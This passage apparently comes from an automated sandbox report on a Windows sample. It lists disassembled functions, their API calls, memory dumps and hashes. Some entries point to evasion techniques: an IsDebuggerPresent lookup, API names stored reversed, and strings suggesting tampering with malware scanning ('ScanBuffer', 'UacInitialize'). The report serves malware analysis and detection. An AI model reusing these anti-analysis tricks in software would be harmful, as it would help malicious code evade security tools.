                                                                                                                        • CharToOemA.USER32(?,?), ref: 029CAE83
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 029CAEA0
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029CAEA6
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,029CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029CAEBB
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,029CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029CAEC1
                                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 029CAEE3
                                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 029CAEF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 185507032-0
                                                                                                                        • Opcode ID: eaef128e03162120a97379982cf9fa4b3a6bf283baad14afaaa51881b3249593
                                                                                                                        • Instruction ID: 89ade34ed2fc2b1117a93c6ac5dd1f94f38859e26416e97bb8bff29c4aa8f8a9
                                                                                                                        • Opcode Fuzzy Hash: eaef128e03162120a97379982cf9fa4b3a6bf283baad14afaaa51881b3249593
                                                                                                                        • Instruction Fuzzy Hash: B0117CB2588304BAD200FBA4CD84F9B77EEABC4710F60092EB384D60D0DA74E9448F67
                                                                                                                        Function 029CE514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029CE5AD
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029CE5C9
                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 029CE602
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029CE67F
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 029CE698
                                                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 029CE6CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 351091851-0
                                                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                        • Instruction ID: c884a381b70437853b17c7616dbb394f29b30e78ebb71aed97ea13f4e5108153
                                                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                        • Instruction Fuzzy Hash: 8651E875A1062D9BCB26EB58CC80BD9B7BDBF8C300F5041E9E549A7241D734AF858F62
                                                                                                                        Function 029C3568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C358A
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35BD
                                                                                                                        • RegCloseKey.ADVAPI32(?,029C35E0,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35D3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                                        • Opcode ID: df82f6ae10c9837bd35d91a1d7302bc6038e677b1c39337f0bd34b319d8163b4
                                                                                                                        • Instruction ID: 01c70c73a7cef30ba0ec158296a1d78883ff80dbaa23d7adf8413f81cc2d78b0
                                                                                                                        • Opcode Fuzzy Hash: df82f6ae10c9837bd35d91a1d7302bc6038e677b1c39337f0bd34b319d8163b4
                                                                                                                        • Instruction Fuzzy Hash: B901F579944248FAFB10DB908D02BBD73ECD748720F6044A9BA04D6580E6749610DA6D
                                                                                                                        Function 029D80C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                                                        • API String ID: 667068680-1372893251
                                                                                                                        • Opcode ID: 6058bce2b7a1e8fdc203ce7b97ac67f358bea5f4edd366733f08a11d9f12b14a
                                                                                                                        • Instruction ID: 1ab70c8d8340e52208adc3643376eaec1643753cf8188ca4ab73f74a38b3b95f
                                                                                                                        • Opcode Fuzzy Hash: 6058bce2b7a1e8fdc203ce7b97ac67f358bea5f4edd366733f08a11d9f12b14a
                                                                                                                        • Instruction Fuzzy Hash: C701A775740308AFEB00EFA8DD51E9E77FEFBC8710F6188A8B404D7641DA30E9059A25
                                                                                                                        Function 029CA9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,029CAA6F,?,?,00000000), ref: 029CA9F0
                                                                                                                          • Part of subcall function 029CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,029CAA6F,?,?,00000000), ref: 029CAA20
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 029CAA2B
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,029CAA6F,?,?,00000000), ref: 029CAA49
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 029CAA54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4102113445-0
                                                                                                                        • Opcode ID: 575f22f049bd4f4c98776dc94bb06a5c291db6f81843d4687634d36aaf8de9e0
                                                                                                                        • Instruction ID: a69f66e8321690ca999c86ef0e7898bce17e2af31923a8564196ec7a0d025c70
                                                                                                                        • Opcode Fuzzy Hash: 575f22f049bd4f4c98776dc94bb06a5c291db6f81843d4687634d36aaf8de9e0
                                                                                                                        • Instruction Fuzzy Hash: D901F23160065C6FF301FAB4CD12B6E739EDBC6720FB1016CE500A6AC0D6349E008AA7
                                                                                                                        Function 029EBE86 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C3538: GetKeyboardType.USER32(00000000), ref: 029C353D
                                                                                                                          • Part of subcall function 029C3538: GetKeyboardType.USER32(00000001), ref: 029C3549
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 029EC06C
                                                                                                                        • GetACP.KERNEL32 ref: 029EC080
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 029EC08A
                                                                                                                          • Part of subcall function 029C3568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C358A
                                                                                                                          • Part of subcall function 029C3568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35BD
                                                                                                                          • Part of subcall function 029C3568: RegCloseKey.ADVAPI32(?,029C35E0,00000000,?,00000004,00000000,029C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029C35D3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                        • String ID: &v
                                                                                                                        • API String ID: 3316616684-2659828657
                                                                                                                        • Opcode ID: 3278a07358eaaaf7dee49c3f9d1abc5ba24e31dccba648a8f500b521b6556000
                                                                                                                        • Instruction ID: 29be09c61d47dabb47230e57d1c2920c7ca52878726ec45639eadc52bdca95dc
                                                                                                                        • Opcode Fuzzy Hash: 3278a07358eaaaf7dee49c3f9d1abc5ba24e31dccba648a8f500b521b6556000
                                                                                                                        • Instruction Fuzzy Hash: 61011E60C893C09ADB05AB75A7552597FB2AF433657258CCDCC844F212DE28812BCFAB
                                                                                                                        Function 029CAA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,029CAC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 029CAAB7
                                                                                                                          • Part of subcall function 029CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029CA76A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                        • Opcode ID: d63171433b86d528d58f4108b02755ed0b9e94db0b95048fd598363d4086ee38
                                                                                                                        • Instruction ID: 631b75ae238b88c8c9c41c8acb609bf9dec8c0b844bd8798a082f3584185df6a
                                                                                                                        • Opcode Fuzzy Hash: d63171433b86d528d58f4108b02755ed0b9e94db0b95048fd598363d4086ee38
                                                                                                                        • Instruction Fuzzy Hash: 3741B17474460D4BD712AF69C9A02BEB3EBEBC5300B745A2ED462C7345DA38DD069A23
                                                                                                                        Function 029D8020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc
                                                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                        • API String ID: 1883125708-1952140341
                                                                                                                        • Opcode ID: 14f33bb6fd92f03520fbffbf14b7ca9c1217e7386ae95115b9f60e2ab8b6ad69
                                                                                                                        • Instruction ID: 3fce80b0569733c59000c070d45e04491655fcf0b77fb754f06ef1cab7d23c1a
                                                                                                                        • Opcode Fuzzy Hash: 14f33bb6fd92f03520fbffbf14b7ca9c1217e7386ae95115b9f60e2ab8b6ad69
                                                                                                                        • Instruction Fuzzy Hash: 30F09675640304AFEB10FFB8DD519AE77EEF7C9B00BE189A4F404D3A01DA30AD169A25
                                                                                                                        Function 029DEB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,029DEF98,UacInitialize,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,Initialize), ref: 029DEB9A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029DEBAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 1646373207-2367923768
                                                                                                                        • Opcode ID: c496aa6a535e1f1227b8a63bd6cb22d80cab42b82d76de8c3bdf5c138f391724
                                                                                                                        • Instruction ID: cb3b46b6cb5e384c5a7a095bee4a2a4922f4c5ccc761e611258a1f91702df73a
                                                                                                                        • Opcode Fuzzy Hash: c496aa6a535e1f1227b8a63bd6cb22d80cab42b82d76de8c3bdf5c138f391724
                                                                                                                        • Instruction Fuzzy Hash: C6D012B2B557141EBA00BAF50CC4C2E02CD89C952A3304E7DB0A3DA1D2E6AED8122522
                                                                                                                        Function 029CC3FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,029EC10B,00000000,029EC11E), ref: 029CC402
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 029CC413
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                        • Opcode ID: 4cfb1f5556863e405c1f0d8945e8d303bad18ae2492cdfa359d450859d6177d1
                                                                                                                        • Instruction ID: 50479b134cad65615a54947e7ccc2282c301a5d5af5a0614d48c03585f06e47b
                                                                                                                        • Opcode Fuzzy Hash: 4cfb1f5556863e405c1f0d8945e8d303bad18ae2492cdfa359d450859d6177d1
                                                                                                                        • Instruction Fuzzy Hash: ECD09EB1A453019EEB00AAB568806362ADC97CD705B74D86EB05D59142D77244144FA7
                                                                                                                        Function 029CE170 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029CE21F
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029CE23B
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029CE2B2
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 029CE2DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 920484758-0
                                                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                        • Instruction ID: 9a93de2dd5b4050195d771dafb6fbcba10d962ec76874d94b7ad23eeca76d90c
                                                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                        • Instruction Fuzzy Hash: A6412C75A0021D9FCB62DB58CC90BD9B7BDBF88300F1041E9E689A7341DA30AF808F61
                                                                                                                        Function 029CACC4 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029CACE1
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029CAD05
                                                                                                                        • GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029CAD20
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029CADB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        • Opcode ID: e8858114dcbd39f35e81c5f2d33f28578d508745839337c25549a0fef0c4e7d7
                                                                                                                        • Instruction ID: 714fabb8d129836ce964401fc9ca713626b9dc0285c12d557836346f880288de
                                                                                                                        • Opcode Fuzzy Hash: e8858114dcbd39f35e81c5f2d33f28578d508745839337c25549a0fef0c4e7d7
                                                                                                                        • Instruction Fuzzy Hash: 67413970A4025C9BDB21EF68CD84BDAB7FDAB58300F2044EAA548E7251DB749F84CF52
                                                                                                                        Function 029CACC2 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 029CACE1
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029CAD05
                                                                                                                        • GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029CAD20
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029CADB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
